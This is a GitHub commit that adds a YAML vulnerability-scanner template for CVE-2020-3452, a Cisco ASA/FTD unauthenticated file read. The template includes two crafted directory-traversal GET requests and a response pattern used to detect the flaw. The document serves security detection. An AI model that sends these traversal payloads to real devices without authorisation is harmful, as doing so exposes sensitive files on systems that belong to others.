Skip to content

Commit cce83b8

Browse files
Merge pull request #71 from wallarm/feature/cisco-cve-2020-3452
CVE-2020-3452
2 parents 97dd4a1 + 05e1d62 commit cce83b8

File tree

1 file changed

+22
-0
lines changed

1 file changed

+22
-0
lines changed
Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
send:
2+
- method: 'GET'
3+
url: '/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
4+
5+
- method: 'GET'
6+
url: '/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'
7+
8+
detect:
9+
- response:
10+
- body: '--\sCopyright\s\(C\)\s2006-2018\sby\sCisco\sSystems,\sInc'
11+
12+
meta-info:
13+
- title: "Unauthenticated file read in Cisco ASA/FTD (CVE-2020-3452)"
14+
- description: "A vulnerability exists in the web service interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software that allows an unauthenticated remote attacker to send a crafted HTTP request to the affected device. By successfully exploiting the vulnerability, the attacker can perform directory traversal attacks and read sensitive files on the target system."
15+
- additional: "For more information see https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86"
16+
- type: ptrav
17+
- threat: 75
18+
- applicable_for:
19+
- scanner
20+
- tags:
21+
- CVE-2020-3452
22+
- Cisco

0 commit comments

Comments
 (0)